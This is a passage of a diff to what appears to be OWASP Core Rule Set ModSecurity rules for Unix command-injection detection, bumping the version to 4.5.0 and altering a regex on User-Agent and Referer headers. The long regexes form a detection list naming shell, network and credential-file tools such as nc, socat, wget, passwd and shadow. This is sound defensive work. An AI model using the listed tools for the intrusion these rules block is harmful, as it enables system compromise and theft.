or|request))|m(?:a(?:(?:n|ke)[\s\x0b&\)<>\|]|il(?:[\s\x0b&\)<>q\|]|x[\s\x0b&\)<>\|])|ster\.passwd|wk)|tr|(?:v|utt)[\s\x0b&\)<>\|]|k(?:dir[\s\x0b&\)<>\|]|fifo|nod|temp)|locate|o(?:squitto|unt[\s\x0b&\)<>\|])|sg(?:attrib|c(?:at|onv)|filter|merge|uniq)|ysql(?:admin|dump(?:slow)?|hotcopy|show)?)|n(?:c(?:[\s\x0b&\)<>\|]|\.(?:openbsd|traditional)|at)|e(?:t(?:[\s\x0b&\)<>\|]|(?:c|st)at|kit-ftp|plan)|ofetch)|(?:(?:ul)?l|ice)[\s\x0b&\)<>\|]|m(?:[\s\x0b&\)<>\|]|ap)|p(?:m[\s\x0b&\)<>\|]|ing)|a(?:no[\s\x0b&\)<>\|]|sm|wk)|o(?:de[\s\x0b&\)<>\|]|hup)|roff|s(?:enter|lookup|tat))|o(?:(?:d|ctave)[\s\x0b&\)<>\|]|nintr|p(?:en(?:ssl|v(?:pn|t))|kg))|p(?:a(?:(?:x|rted|tch)[\s\x0b&\)<>\|]|s(?:swd|te[\s\x0b&\)<>\|]))|d(?:b|f(?:la)?tex|ksh)|f(?:[\s\x0b&\)<>\|]|tp)|g(?:rep)?|hp(?:[\s\x0b&\)57<>\|]|-cgi)|i(?:(?:co?|ng)[\s\x0b&\)<>\|]|p[^\s\x0b]|dstat|gz)|k(?:g(?:_?info)?|exec|ill)|r(?:y?[\s\x0b&\)<>\|]|int(?:env|f[\s\x0b&\)<>\|]))|t(?:x|ar(?:diff|grep)?)|wd(?:\.db)?|xz|er(?:(?:f|ms)[\s\x0b&\)<>\|]|l(?:[\s\x0b&\)5<>\|]|sh))|opd|s(?:ed|ftp|ql)|u(?:ppet[\s\x0b&\)<>\|]|shd)|y(?:thon[^\s\x0b]|3?versions))|r(?:a(?:r[\s\x0b&\)<>\|]|k(?:e[\s\x0b&\)<>\|]|u))|c(?:p[\s\x0b&\)<>\|])?|e(?:(?:d(?:carpet)?|v|name|p(?:eat|lace))[\s\x0b&\)<>\|]|a(?:delf|lpath)|stic)|m(?:(?:dir)?[\s\x0b&\)<>\|]|user)|pm(?:[\s\x0b&\)<>\|]|db|(?:quer|verif)y)|bash|l(?:ogin|wrap)|nano|oute[\s\x0b&\)<>\|]|sync|u(?:by[^\s\x0b]|n-(?:mailcap|parts))|vi(?:ew|m))|s(?:c(?:p|(?:hed|r(?:een|ipt))[\s\x0b&\)<>\|])|e(?:(?:d|lf|rvice)[\s\x0b&\)<>\|]|t(?:(?:facl)?[\s\x0b&\)<>\|]|arch|env|sid)|ndmail)|(?:g|ash|nap)[\s\x0b&\)<>\|]|h(?:(?:adow|ells)?[\s\x0b&\)<>\|]|\.distrib|u(?:f|tdown[\s\x0b&\)<>\|]))|s(?:[\s\x0b&\)<>\|]|h(?:[\s\x0b&\)<>\|]|-key(?:ge|sca)n|pass))|u(?:[\s\x0b&\)<>\|]|do)|vn|diff|ftp|l(?:eep[\s\x0b&\)<>\|]|sh)|mbclient|o(?:cat|elim|(?:rt|urce)[\s\x0b&\)<>\|])|p(?:lit[\s\x0b&\)<>\|]|wd\.db)|qlite3|t(?:art-stop-daemon|d(?:buf|err|in|out)|r(?:ace|ings[\s\x0b&\)<>\|]))|ys(?:ctl|tem(?:ctl|d-resolve)))|t(?:a(?:c|r[\s\x0b&\)<>\|]|il[\s\x0b&\)<>f\|]|sk(?:[\s\x0b&\)<>\|]|set))|bl|c(?:p(?:[\s\x0b&\)<>\|]|dump|ing|traceroute)|l?sh)|e(?:[ex][\s\x0b&\)<>\|]|lnet)|i(?:c[\s\x0b&\)<>\|]|me(?:datectl|out[\s\x0b&\)<>\|]))|o(?:p|uch[\s\x0b&\)<>\|])|ftp|mux|r(?:aceroute6?|off)|shark)|u(?:dp|l(?:imit)?[\s\x0b&\)<>\|]|n(?:ame|(?:compress|s(?:et|hare))[\s\x0b&\)<>\|]|expand|iq|l(?:ink[\s\x0b&\)<>\|]|z(?:4|ma))|(?:pig|x)z|rar|z(?:ip[\s\x0b&\)<>\|]|std))|pdate-alternatives|ser(?:(?:ad|mo)d|del)|u(?:de|en)code)|v(?:i(?:m(?:[\s\x0b&\)<>\|]|diff)|ew[\s\x0b&\)<>\|]|gr|pw|rsh|sudo)|algrind|olatility[\s\x0b&\)<>\|])|w(?:3m|c|a(?:ll|tch)[\s\x0b&\)<>\|]|get|h(?:iptail[\s\x0b&\)<>\|]|o(?:ami|is))|i(?:reshark|sh[\s\x0b&\)<>\|]))|x(?:(?:x|pa)d|z(?:[\s\x0b&\)<>\|]|c(?:at|mp)|d(?:ec|iff)|[ef]?grep|less|more)|args|e(?:la)?tex|mo(?:dmap|re)|term)|y(?:(?:e(?:s|lp)|arn)[\s\x0b&\)<>\|]|um)|z(?:ip(?:[\s\x0b&\)<>\|]|c(?:loak|mp)|details|grep|info|(?:merg|not)e|split|tool)|s(?:h|oelim|td(?:(?:ca|m)t|grep|less)?)|athura|c(?:at|mp)|diff|e(?:grep|ro[\s\x0b&\)<>\|])|f?grep|less|more|run|ypper))" \ "id:932236,\ phase:2,\ block,\ @@ -591,11 +591,11 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/1000/152/248/88',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" -SecRule REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer "@rx (?i)(?:^|b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|[ls][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)?|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|\{)|<(?:\(|<<)|>\(|\([\s\x0b]*\))[\s\x0b]*(?:[\$\{]|(?:[\s\x0b]*\(|!)[\s\x0b]*|[0-9A-Z_a-z]+=(?:[^\s\x0b]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\x0b]+)*[\s\x0b]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:7z[arx]?|(?:(?:GE|POS)T|HEAD)[\s\x0b&\)<>\|]|a(?:(?:b|w[ks]|l(?:ias|pine)|xel)[\s\x0b&\)<>\|]|pt(?:[\s\x0b&\)<>\|]|-get)|r(?:[\s\x0b&\)<>j\|]|(?:p|ch)[\s\x0b&\)<>\|]|ia2c)|s(?:h[\s\x0b&\)<>\|]|cii(?:-xfr|85)|pell)|dd(?:group|user)|getty|nsible|tobm)|b(?:z(?:z[\s\x0b&\)<>\|]|c(?:at|mp)|diff|e(?:grep|xe)|f?grep|ip2(?:recover)?|less|more)|a(?:s(?:e(?:32|64|n(?:ame[\s\x0b&\)<>\|]|c))|h[\s\x0b&\)<>\|])|tch[\s\x0b&\)<>\|])|lkid|pftrace|r(?:eaksw|idge[\s\x0b&\)<>\|])|sd(?:cat|iff|tar)|u(?:iltin|n(?:dler[\s\x0b&\)<>\|]|zip2)|s(?:ctl|ybox))|y(?:ebug|obu))|c(?:[89]9|(?:a(?:t|ncel|psh)|c)[\s\x0b&\)<>\|]|mp|p(?:[\s\x0b&\)<>\|]|io|ulimit)|s(?:h|cli[\s\x0b&\)<>\|]|plit|vtool)|u(?:t[\s\x0b&\)<>\|]|psfilter)|ertbot|h(?:attr|(?:dir|root)[\s\x0b&\)<>\|]|e(?:ck_(?:by_ssh|cups|log|memory|raid|s(?:sl_cert|tatusfile))|f[\s\x0b&\)\-<>\|])|(?:flag|pas)s|g(?:passwd|rp)|mod|o(?:om|wn)|sh)|lang(?:[\s\x0b&\)<>\|]|\+\+)|o(?:(?:b|pro)c|(?:lumn|m(?:m(?:and)?|p(?:oser|ress)))[\s\x0b&\)<>\|]|w(?:say|think))|r(?:ash[\s\x0b&\)<>\|]|on(?:[\s\x0b&\)<>\|]|tab)))|d(?:(?:[du]|i(?:(?:alo)?g|r|ff)|a(?:sh|te))[\s\x0b&\)<>\|]|f|hclient|m(?:esg|idecode|setup)|o(?:as|(?:cker|ne)[\s\x0b&\)<>\|]|sbox)|pkg|vips)|e(?:(?:[bd]|cho)[\s\x0b&\)<>\|]|n(?:v(?:[\s\x0b&\)<>\|]|-update)|d(?:if|sw))|qn|s(?:[\s\x0b&\)<>h\|]|ac)|x(?:(?:ec)?[\s\x0b&\)<>\|]|iftool|p(?:(?:and|(?:ec|or)t)[\s\x0b&\)<>\|]|r))|2fsck|(?:asy_instal|va)l|fax|grep|macs)|f(?:(?:c|etch|lock|unction)[\s\x0b&\)<>\|]|d|g(?:rep)?|i(?:(?:n(?:d|ger)|sh)?[\s\x0b&\)<>\|]|le(?:[\s\x0b&\)<>\|]|test))|mt|tp(?:[\s\x0b&\)<>\|]|stats|who)|acter|o(?:ld[\s\x0b&\)<>\|]|reach)|ping)|g(?:c(?:c[^\s\x0b]|ore)|db|e(?:(?:m|tfacl)[\s\x0b&\)<>\|]|ni(?:e[\s\x0b&\)<>\|]|soimage))|hci?|i(?:(?:t|mp)[\s\x0b&\)<>\|]|nsh)|(?:o|awk)[\s\x0b&\)<>\|]|pg|r(?:c|ep[\s\x0b&\)<>\|]|oup(?:[\s\x0b&\)<>\|]|mod))|tester|unzip|z(?:cat|exe|ip))|h(?:(?:d|up|ash|i(?:ghlight|story))[\s\x0b&\)<>\|]|e(?:ad[\s\x0b&\)<>\|]|xdump)|ost(?:id|name)|ping3|t(?:digest|op|passwd))|i(?:d|p(?:6?tables|config)?|rb|conv|f(?:config|top)|nstall[\s\x0b&\)<>\|]|onice|spell)|j(?:js|q|ava[\s\x0b&\)<>\|]|exec|o(?:(?:bs|in)[\s\x0b&\)<>\|]|urnalctl)|runscript)|k(?:s(?:h|shell)|ill(?:[\s\x0b&\)<>\|]|all)|nife[\s\x0b&\)<>\|])|l(?:d(?:d?[\s\x0b&\)<>\|]|config)|(?:[np]|ynx)[\s\x0b&\)<>\|]|s(?:-F|b_release|cpu|hw|mod|of|pci|usb)?|ua(?:[\s\x0b&\)<>\|]|(?:la)?tex)|z(?:[\s\x0b&\)4<>\|]|4c(?:at)?|c(?:at|mp)|diff|[ef]?grep|less|m(?:a(?:dec|info)?|ore))|a(?:st(?:[\s\x0b&\)<>\|]|comm|log(?:in)?)|tex[\s\x0b&\)<>\|])|ess(?:[\s\x0b&\)<>\|]|echo|(?:fil|pip)e)|ftp(?:get)?|o(?:(?:ca(?:l|te)|ok)[\s\x0b&\)<>\|]|g(?:inctl|(?:nam|sav)e)|setup)|trace|wp-(?:d(?:ownload|ump)|mirror|request))|m(?:a(?:(?:n|ke)[\s\x0b&\)<>\|]|il(?:[\s\x0b&\)<>q\|]|x[\s\x0b&\)<>\|])|ster\.passwd|wk)|tr|(?:v|utt)[\s\x0b&\)<>\|]|k(?:dir[\s\x0b&\)<>\|]|fifo|nod|temp)|locate|o(?:squitto|unt[\s\x0b&\)<>\|])|sg(?:attrib|c(?:at|onv)|filter|merge|uniq)|ysql(?:admin|dump(?:slow)?|hotcopy|show)?)|n(?:c(?:[\s\x0b&\)<>\|]|\.(?:openbsd|traditional)|at)|e(?:t(?:[\s\x0b&\)<>\|]|(?:c|st)at|kit-ftp|plan)|ofetch)|(?:(?:ul)?l|ice)[\s\x0b&\)<>\|]|m(?:[\s\x0b&\)<>\|]|ap)|p(?:m[\s\x0b&\)<>\|]|ing)|a(?:no[\s\x0b&\)<>\|]|sm|wk)|o(?:de[\s\x0b&\)<>\|]|hup)|roff|s(?:enter|lookup|tat))|o(?:(?:d|ctave)[\s\x0b&\)<>\|]|nintr|p(?:en(?:ssl|v(?:pn|t))|kg))|p(?:a(?:(?:x|rted|tch)[\s\x0b&\)<>\|]|s(?:swd|te[\s\x0b&\)<>\|]))|d(?:b|f(?:la)?tex|ksh)|f(?:[\s\x0b&\)<>\|]|tp)|g(?:rep)?|hp(?:[\s\x0b&\)57<>\|]|-cgi)|i(?:(?:co?|ng)[\s\x0b&\)<>\|]|p[^\s\x0b]|dstat|gz)|k(?:g(?:_?info)?|exec|ill)|r(?:y?[\s\x0b&\)<>\|]|int(?:env|f[\s\x0b&\)<>\|]))|t(?:x|ar(?:diff|grep)?)|wd(?:\.db)?|xz|er(?:(?:f|ms)[\s\x0b&\)<>\|]|l(?:[\s\x0b&\)5<>\|]|sh))|opd|s(?:ed|ftp|ql)|u(?:ppet[\s\x0b&\)<>\|]|shd)|y(?:thon[23]|3?versions))|r(?:a(?:r[\s\x0b&\)<>\|]|k(?:e[\s\x0b&\)<>\|]|u))|c(?:p[\s\x0b&\)<>\|])?|e(?:(?:d(?:carpet)?|v|name|p(?:eat|lace))[\s\x0b&\)<>\|]|a(?:delf|lpath)|stic)|m(?:(?:dir)?[\s\x0b&\)<>\|]|user)|pm(?:[\s\x0b&\)<>\|]|db|(?:quer|verif)y)|bash|l(?:ogin|wrap)|nano|oute[\s\x0b&\)<>\|]|sync|u(?:by[^\s\x0b]|n-(?:mailcap|parts))|vi(?:ew|m))|s(?:c(?:p|(?:hed|r(?:een|ipt))[\s\x0b&\)<>\|])|e(?:(?:d|lf|rvice)[\s\x0b&\)<>\|]|t(?:(?:facl)?[\s\x0b&\)<>\|]|arch|env|sid)|ndmail)|(?:g|ash)[\s\x0b&\)<>\|]|h(?:(?:adow|ells)?[\s\x0b&\)<>\|]|\.distrib|u(?:f|tdown[\s\x0b&\)<>\|]))|s(?:[\s\x0b&\)<>\|]|h(?:[\s\x0b&\)<>\|]|-key(?:ge|sca)n|pass))|u(?:[\s\x0b&\)<>\|]|do)|vn|diff|ftp|l(?:eep[\s\x0b&\)<>\|]|sh)|mbclient|o(?:cat|elim|(?:rt|urce)[\s\x0b&\)<>\|])|p(?:lit[\s\x0b&\)<>\|]|wd\.db)|qlite3|t(?:art-stop-daemon|d(?:buf|err|in|out)|r(?:ace|ings[\s\x0b&\)<>\|]))|ys(?:ctl|tem(?:ctl|d-resolve)))|t(?:a(?:c|r[\s\x0b&\)<>\|]|il[\s\x0b&\)<>f\|]|sk(?:[\s\x0b&\)<>\|]|set))|bl|c(?:p(?:[\s\x0b&\)<>\|]|dump|ing|traceroute)|l?sh)|e(?:[ex][\s\x0b&\)<>\|]|lnet)|i(?:c[\s\x0b&\)<>\|]|me(?:datectl|out[\s\x0b&\)<>\|]))|o(?:p|uch[\s\x0b&\)<>\|])|ftp|mux|r(?:aceroute6?|off)|shark)|u(?:dp|l(?:imit)?[\s\x0b&\)<>\|]|n(?:ame|(?:compress|s(?:et|hare))[\s\x0b&\)<>\|]|expand|iq|l(?:ink[\s\x0b&\)<>\|]|z(?:4|ma))|(?:pig|x)z|rar|z(?:ip[\s\x0b&\)<>\|]|std))|pdate-alternatives|ser(?:(?:ad|mo)d|del)|u(?:de|en)code)|v(?:i(?:m(?:[\s\x0b&\)<>\|]|diff)|ew[\s\x0b&\)<>\|]|gr|pw|rsh|sudo)|algrind|olatility[\s\x0b&\)<>\|])|w(?:c|a(?:ll|tch)[\s\x0b&\)<>\|]|h(?:iptail[\s\x0b&\)<>\|]|o(?:ami|is))|i(?:reshark|sh[\s\x0b&\)<>\|]))|x(?:(?:x|pa)d|z(?:[\s\x0b&\)<>\|]|c(?:at|mp)|d(?:ec|iff)|[ef]?grep|less|more)|args|e(?:la)?tex|mo(?:dmap|re)|term)|y(?:(?:e(?:s|lp)|arn)[\s\x0b&\)<>\|]|um)|z(?:ip(?:[\s\x0b&\)<>\|]|c(?:loak|mp)|details|grep|info|(?:merg|not)e|split|tool)|s(?:h|oelim|td(?:(?:ca|m)t|grep|less)?)|athura|c(?:at|mp)|diff|e(?:grep|ro[\s\x0b&\)<>\|])|f?grep|less|more|run|ypper))" \ +SecRule REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer "@rx (?i)(?:^|b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|[ls][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)?|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|[\[\{])|<(?:\(|<<)|>\(|\([\s\x0b]*\))[\s\x0b]*(?:[\$\{]|(?:[\s\x0b]*\(|!)[\s\x0b]*|[0-9A-Z_a-z]+=(?:[^\s\x0b]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\x0b]+)*[\s\x0b]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:7z[arx]?|(?:(?:GE|POS)T|HEAD)[\s\x0b&\)<>\|]|a(?:(?:b|w[ks]|l(?:ias|pine)|xel)[\s\x0b&\)<>\|]|pt(?:[\s\x0b&\)<>\|]|-get)|r(?:[\s\x0b&\)<>j\|]|(?:p|ch)[\s\x0b&\)<>\|]|ia2c)|s(?:h[\s\x0b&\)<>\|]|cii(?:-xfr|85)|pell)|dd(?:group|user)|getty|nsible|tobm)|b(?:z(?:z[\s\x0b&\)<>\|]|c(?:at|mp)|diff|e(?:grep|xe)|f?grep|ip2(?:recover)?|less|more)|a(?:s(?:e(?:32|64|n(?:ame[\s\x0b&\)<>\|]|c))|h[\s\x0b&\)<>\|])|tch[\s\x0b&\)<>\|])|lkid|pftrace|r(?:eaksw|idge[\s\x0b&\)<>\|])|sd(?:cat|iff|tar)|u(?:iltin|n(?:dler[\s\x0b&\)<>\|]|zip2)|s(?:ctl|ybox))|y(?:ebug|obu))|c(?:[89]9|(?:a(?:t|ncel|psh)|c)[\s\x0b&\)<>\|]|mp|p(?:[\s\x0b&\)<>\|]|io|ulimit)|s(?:h|cli[\s\x0b&\)<>\|]|plit|vtool)|u(?:t[\s\x0b&\)<>\|]|psfilter)|ertbot|h(?:attr|(?:dir|root)[\s\x0b&\)<>\|]|e(?:ck_(?:by_ssh|cups|log|memory|raid|s(?:sl_cert|tatusfile))|f[\s\x0b&\)\-<>\|])|(?:flag|pas)s|g(?:passwd|rp)|mod|o(?:om|wn)|sh)|lang(?:[\s\x0b&\)<>\|]|\+\+)|o(?:(?:b|pro)c|(?:lumn|m(?:m(?:and)?|p(?:oser|ress)))[\s\x0b&\)<>\|]|w(?:say|think))|r(?:ash[\s\x0b&\)<>\|]|on(?:[\s\x0b&\)<>\|]|tab)))|d(?:(?:[du]|i(?:(?:alo)?g|r|ff)|a(?:sh|te))[\s\x0b&\)<>\|]|f|hclient|m(?:esg|idecode|setup)|o(?:as|(?:cker|ne)[\s\x0b&\)<>\|]|sbox)|pkg|vips)|e(?:(?:[bd]|cho)[\s\x0b&\)<>\|]|n(?:v(?:[\s\x0b&\)<>\|]|-update)|d(?:if|sw))|qn|s(?:[\s\x0b&\)<>h\|]|ac)|x(?:(?:ec)?[\s\x0b&\)<>\|]|iftool|p(?:(?:and|(?:ec|or)t)[\s\x0b&\)<>\|]|r))|2fsck|(?:asy_instal|va)l|fax|grep|macs)|f(?:(?:c|etch|lock|unction)[\s\x0b&\)<>\|]|d|g(?:rep)?|i(?:(?:n(?:d|ger)|sh)?[\s\x0b&\)<>\|]|le(?:[\s\x0b&\)<>\|]|test))|mt|tp(?:[\s\x0b&\)<>\|]|stats|who)|acter|o(?:ld[\s\x0b&\)<>\|]|reach)|ping)|g(?:c(?:c[^\s\x0b]|ore)|db|e(?:(?:m|tfacl)[\s\x0b&\)<>\|]|ni(?:e[\s\x0b&\)<>\|]|soimage))|hci?|i(?:(?:t|mp)[\s\x0b&\)<>\|]|nsh)|(?:o|awk)[\s\x0b&\)<>\|]|pg|r(?:c|ep[\s\x0b&\)<>\|]|oup(?:[\s\x0b&\)<>